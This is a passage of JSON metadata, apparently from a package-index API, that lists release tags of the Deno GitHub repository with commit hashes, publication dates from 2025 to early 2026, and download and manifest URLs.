anifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2